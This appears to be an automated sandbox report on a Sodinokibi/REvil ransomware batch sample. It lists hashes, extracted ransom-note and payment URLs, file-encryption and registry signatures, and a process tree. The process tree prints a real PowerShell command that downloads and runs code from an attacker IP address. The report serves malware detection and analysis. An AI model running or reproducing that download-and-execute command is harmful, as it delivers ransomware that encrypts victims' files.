Analysis
-
max time kernel
48s -
max time network
48s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
22-08-2020 07:10
Static task
static1
Behavioral task
behavioral1
Sample
d011698f0a0292375484c2ce503fd5f4.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
d011698f0a0292375484c2ce503fd5f4.bat
Resource
win10
General
-
Target
d011698f0a0292375484c2ce503fd5f4.bat
-
Size
221B
-
MD5
2620ae9cab8fc22007e8184ba8972c49
-
SHA1
fa1095550cb3150a7cadd676bb594e5c60060a2c
-
SHA256
6031919615418117acd8af53074b43ca886e452074663ea10765ae56ff83b813
-
SHA512
8a2b0c4537d60159956ce3edf73f136ee9bd2c7194b0a0dbed17c234df0a8bb5a0effb21752bd9d6d5c7b87e43ae50f7e6fb58e613a9e61533b0b7274dfe8ebe
Malware Config
Extracted
http://185.103.242.78/pastes/d011698f0a0292375484c2ce503fd5f4
Extracted
C:\ae5ba-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3A11937213753CE2
http://decryptor.cc/3A11937213753CE2
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 620 powershell.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\SearchSet.tiff powershell.exe File renamed C:\Users\Admin\Pictures\JoinUninstall.tiff => \??\c:\users\admin\pictures\JoinUninstall.tiff.ae5ba powershell.exe File renamed C:\Users\Admin\Pictures\DisconnectInstall.raw => \??\c:\users\admin\pictures\DisconnectInstall.raw.ae5ba powershell.exe File renamed C:\Users\Admin\Pictures\SearchSet.tiff => \??\c:\users\admin\pictures\SearchSet.tiff.ae5ba powershell.exe File renamed C:\Users\Admin\Pictures\WaitGroup.tif => \??\c:\users\admin\pictures\WaitGroup.tif.ae5ba powershell.exe File opened for modification \??\c:\users\admin\pictures\JoinUninstall.tiff powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gcn99c9mo7e.bmp" powershell.exe -
Drops file in Program Files directory 37 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\CompareCompress.tiff powershell.exe File opened for modification \??\c:\program files\ConvertToDisable.mp4v powershell.exe File opened for modification \??\c:\program files\RedoResolve.wm powershell.exe File opened for modification \??\c:\program files\UnblockMove.potm powershell.exe File opened for modification \??\c:\program files\GrantConvertTo.ram powershell.exe File opened for modification \??\c:\program files\RequestDebug.otf powershell.exe File opened for modification \??\c:\program files\FindUnpublish.mov powershell.exe File opened for modification \??\c:\program files\InvokeLimit.bmp powershell.exe File opened for modification \??\c:\program files\PushSuspend.wmf powershell.exe File opened for modification \??\c:\program files\ResolveUnprotect.xltm powershell.exe File opened for modification \??\c:\program files\WaitRevoke.xla powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ae5ba-readme.txt powershell.exe File created \??\c:\program files\ae5ba-readme.txt powershell.exe File opened for modification \??\c:\program files\EnterUnlock.m3u powershell.exe File opened for modification \??\c:\program files\RedoComplete.vssx powershell.exe File opened for modification \??\c:\program files\StepSave.png powershell.exe File opened for modification \??\c:\program files\CloseDisconnect.wvx powershell.exe File opened for modification \??\c:\program files\CloseRepair.avi powershell.exe File opened for modification \??\c:\program files\CompleteConvert.emf powershell.exe File opened for modification \??\c:\program files\CompressOpen.3gpp powershell.exe File opened for modification \??\c:\program files\EnableAdd.dib powershell.exe File opened for modification \??\c:\program files\MeasureSwitch.txt powershell.exe File opened for modification \??\c:\program files\SearchUnprotect.pps powershell.exe File opened for modification \??\c:\program files\CompareDeny.wma powershell.exe File opened for modification \??\c:\program files\FindSelect.M2T powershell.exe File opened for modification \??\c:\program files\RemoveWrite.mp4v powershell.exe File opened for modification \??\c:\program files\UndoResolve.m1v powershell.exe File opened for modification \??\c:\program files\ConfirmTest.pps powershell.exe File opened for modification \??\c:\program files\ConvertDisconnect.pub powershell.exe File opened for modification \??\c:\program files\FormatRedo.easmx powershell.exe File opened for modification \??\c:\program files\FormatSet.scf powershell.exe File created \??\c:\program files\microsoft sql server compact edition\ae5ba-readme.txt powershell.exe File created \??\c:\program files (x86)\ae5ba-readme.txt powershell.exe File opened for modification \??\c:\program files\AssertOpen.kix powershell.exe File opened for modification \??\c:\program files\CheckpointCompare.wmx powershell.exe File opened for modification \??\c:\program files\UnregisterAssert.asx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\ae5ba-readme.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 620 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 620 powershell.exe 620 powershell.exe 620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 620 powershell.exe Token: SeDebugPrivilege 620 powershell.exe Token: SeTakeOwnershipPrivilege 620 powershell.exe Token: SeBackupPrivilege 1120 vssvc.exe Token: SeRestorePrivilege 1120 vssvc.exe Token: SeAuditPrivilege 1120 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1264 wrote to memory of 620 1264 cmd.exe powershell.exe PID 1264 wrote to memory of 620 1264 cmd.exe powershell.exe PID 1264 wrote to memory of 620 1264 cmd.exe powershell.exe PID 1264 wrote to memory of 620 1264 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\d011698f0a0292375484c2ce503fd5f4.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d011698f0a0292375484c2ce503fd5f4');Invoke-HGSGRZQUHJGJQK;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1120